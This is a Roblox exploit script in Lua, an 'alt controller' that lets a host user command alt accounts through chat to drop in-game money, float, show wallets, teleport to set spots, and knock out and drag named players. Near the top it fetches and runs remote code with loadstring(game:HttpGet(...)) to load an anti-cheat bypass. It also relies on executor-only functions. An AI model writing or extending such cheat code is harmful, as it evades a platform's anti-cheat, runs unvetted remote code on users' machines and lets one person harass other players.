--// ===============================
--// ALT CONTROLLER SYSTEM (FIXED)
--// ===============================

local Testing = false

-- validate alt index
if table.find(getgenv().Alts, game.Players.LocalPlayer.UserId) then
    getgenv().PointInTable = table.find(getgenv().Alts, game.Players.LocalPlayer.UserId)
else
    return
end

if game.Players.LocalPlayer.Name == getgenv().HostUser or getgenv().Executed then
    return
end

UserSettings().GameSettings.MasterVolume = 0

local Crashed = false

--// GUI + Anti-AFK + FPS drop
if Testing == false then
    local main = Instance.new("ScreenGui")
    local Frame = Instance.new("Frame")
    local TextLabel = Instance.new("TextLabel")

    main.Name = "RenderScreen"
    main.Parent = game.CoreGui
    main.IgnoreGuiInset = true

    Frame.Parent = main
    Frame.Active = true
    Frame.AnchorPoint = Vector2.new(0.5, 0.5)
    Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    Frame.Size = UDim2.new(1, 0, 1, 0)
    Frame.Position = UDim2.new(0.5, 0, 0.5, 0)

    TextLabel.Parent = Frame
    TextLabel.AnchorPoint = Vector2.new(0.5, 0.5)
    TextLabel.BackgroundTransparency = 1
    TextLabel.Position = UDim2.new(0.5, 0, 0.42, 0)
    TextLabel.Size = UDim2.new(0, 279, 0, 34)
    TextLabel.Font = Enum.Font.Gotham
    TextLabel.Text = "Welcome, " .. game.Players.LocalPlayer.Name
    TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
    TextLabel.TextSize = 19

    repeat task.wait(.1) until game:IsLoaded()

    local vu = game:GetService("VirtualUser")
    game:GetService("Players").LocalPlayer.Idled:Connect(function()
        vu:Button2Down(Vector2.new(0, 0), workspace.CurrentCamera.CFrame)
        task.wait(1)
        vu:Button2Up(Vector2.new(0, 0), workspace.CurrentCamera.CFrame)
    end)

    game:GetService("RunService"):Set3dRenderingEnabled(false)
    setfpscap(5)
end

-- Anti-cheat bypass
loadstring(game:HttpGet("https://raw.githubusercontent.com/MsorkyScripts/OpenSourceAntiCheat/main/AntiCheatBypass.txt"))()
getgenv().Executed = true

--// SERVICES
local Connections = {}
local RP = game:GetService("ReplicatedStorage")
local Players = game:GetService("Players")

local Player = Players.LocalPlayer
local Host = Players:FindFirstChild(getgenv().HostUser)

if not Host then
    print("Waiting for Host...")
    Host = Players:WaitForChild(getgenv().HostUser, 9e9)
end

print("Alt System Loaded ✔")

local Cmd = {}

---------------------------------------------------------------------
--// DROP MONEY
---------------------------------------------------------------------
function Cmd.Drop(state)
    if state and not Cmd.Dropping then
        Cmd.Dropping = true
        while Cmd.Dropping do
            RP.MainEvent:FireServer("DropMoney", "15000")
            task.wait(2.5)
        end
    else
        Cmd.Dropping = nil
    end
end

---------------------------------------------------------------------
--// AIRLOCK
---------------------------------------------------------------------
function Cmd.Airlock(state)
    local HRP = Player.Character.HumanoidRootPart
    local bp = HRP:FindFirstChild("AirLockBP")

    if state then
        if bp then bp:Destroy() end
        local new = Instance.new("BodyPosition", HRP)
        new.Name = "AirLockBP"
        new.MaxForce = Vector3.new(9e9,9e9,9e9)
        new.Position = HRP.Position + Vector3.new(0,10,0)
        Cmd.AirLock = true
    else
        Cmd.AirLock = nil
        if bp then bp:Destroy() end
    end
end

---------------------------------------------------------------------
--// SHOW WALLET
---------------------------------------------------------------------
function Cmd.ShowWallet()
    local bp = Player.Backpack:FindFirstChild("Wallet")
    if bp then Player.Character.Humanoid:EquipTool(bp) end
end

---------------------------------------------------------------------
--// REMOVE WALLET
---------------------------------------------------------------------
function Cmd.RemoveWallet()
    if Player.Character:FindFirstChild("Wallet") then
        Player.Character.Humanoid:UnequipTools()
    end
end

---------------------------------------------------------------------
--// BRING PLAYER
---------------------------------------------------------------------
function Cmd.Bring(targetName, location)
    local target = nil
    for _, plr in pairs(Players:GetPlayers()) do
        if plr.Name:lower():sub(1,#targetName) == targetName:lower() then
            target = plr
            break
        end
    end
    if not target or not target.Character or not target.Character:FindFirstChild("HumanoidRootPart") then
        return
    end

    local char = Player.Character
    local root = char.HumanoidRootPart
    local troot = target.Character.HumanoidRootPart

    -- force combat → knockout → grab
    root.CFrame = troot.CFrame * CFrame.new(0,0,1)
    repeat
        char.Humanoid:EquipTool(Player.Backpack:FindFirstChild("Combat"))
        char.Combat:Activate()
        root.CFrame = troot.CFrame * CFrame.new(0,0,1)
        task.wait()
    until target.BodyEffects.K.O.Value == true

    -- grab
    local args = {"Grabbing", false}
    RP.MainEvent:FireServer(unpack(args))

    task.wait(0.5)

    if location == nil then
        root.CFrame = Host.Character.HumanoidRootPart.CFrame
    else
        root.CFrame = location
    end

    RP.MainEvent:FireServer("Grabbing", false)
end

---------------------------------------------------------------------
--// SETUP POSITIONS
---------------------------------------------------------------------
local SetupLocations = {
    bank = CFrame.new(-386.826, 21.25, -325.341),
    admin = CFrame.new(-884.129, -38.39, -545.291),
    klub = CFrame.new(-237.016, -4.875, -411.94),
    vault = CFrame.new(-519.201, 23.19, -292.362),
    train = CFrame.new(606.527, 34.50, -159.08)
}

function Cmd.Setup(loc)
    loc = string.lower(loc)
    local base = SetupLocations[loc]
    if not base then return end

    local pt = getgenv().PointInTable
    local x = (math.floor((pt-1)/10)) * 7
    local z = ((pt-1) % 10) * 3

    Player.Character.HumanoidRootPart.CFrame = base * CFrame.new(x,0,z)
end

---------------------------------------------------------------------
--// CHAT COMMAND HANDLER
---------------------------------------------------------------------
Connections.OnChat = RP.DefaultChatSystemChatEvents.OnMessageDoneFiltering.OnClientEvent:Connect(function(msg)
    local text = msg.Message:lower()
    local speaker = msg.FromSpeaker

    if speaker ~= getgenv().HostUser then return end

    local args = text:split(" ")

    if args[1] == "!drop" then
        if args[2] == "start" then
            Cmd.Drop(true)
        else
            Cmd.Drop(false)
        end
    end

    if args[1] == "!airlock" then
        Cmd.Airlock(args[2] == "on")
    end

    if args[1] == "!wallet" then
        if args[2] == "show" then Cmd.ShowWallet()
        else Cmd.RemoveWallet() end
    end

    if args[1] == "!bring" then
        Cmd.Bring(args[2])
    end

    if args[1] == "!setup" then
        Cmd.Setup(args[2])
    end
end)

print("Alt Command Handler Active ✔")
